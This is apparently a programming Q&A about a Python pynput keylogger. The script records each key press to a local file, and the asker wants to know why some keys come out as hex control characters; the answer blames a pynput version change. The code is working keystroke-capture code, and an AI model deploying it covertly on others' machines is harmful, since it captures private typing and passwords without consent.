# Why my keylogger code randomly changes output between literal chars and ascii hex?

Tags: python, ascii

I've written some code for a keylogger and I encountered something STRANGE.

Whenever I execute the code I have 50% chances for the program to log each char as hex ('\x01').

And 50% for it to log it as the literal char.  ('a')

-Could it be really random?

While I AM NOT changing the code. Each time I run it the output of the chars may CHANGE.

```
import pynput
from pynput.keyboard import Key, Listener

count = 0
keys = []

def on_press(key):
    global keys, count

    keys.append(key)
    count=+1
    print(key)

    if count >= 10:
        count = 0
        write_file(keys)

def on_release(key):
    if key == Key.esc:
        return False

def write_file(keys):
    with open("popa", "a") as wri:
        for key in keys:
            wri.write(str(key))

with Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()
```

I am expecting each char to be outputted in its human-friendly form.

That is NOT a = \x01

Answer (score 1):

I encountered a similar thing after upgrading pynput to version 1.4.2, where keys were converted to hex when ctrl key was down (Mac 10.14.6).

**Best solution was to reinstall pynput (version 1.4).**

Another solution was to revert the hex like this:

```
from pynput.keyboard import KeyCode
def on_press(key):
    #Revert pynput(1.4.2) hex reattr when ctrl_isDown:
    if type(key) == type(KeyCode()) and '\\' in repr(key):
        if ord(key.char) == 31: # '\x1f' -> '-'
            key = KeyCode(char=chr(45))
        elif ord(key.char) in [27, 29]: # '{}' -> '[]'
            key = KeyCode(char=chr(64 + ord(key.char)))
        else:
            key = KeyCode(char=chr(96 + ord(key.char)))

    currently_pressed_keys.add(key)
```

*Note this is only for lower case keys with and without `ctrl` pressed down, not tested for using `alt` or `command` combinations.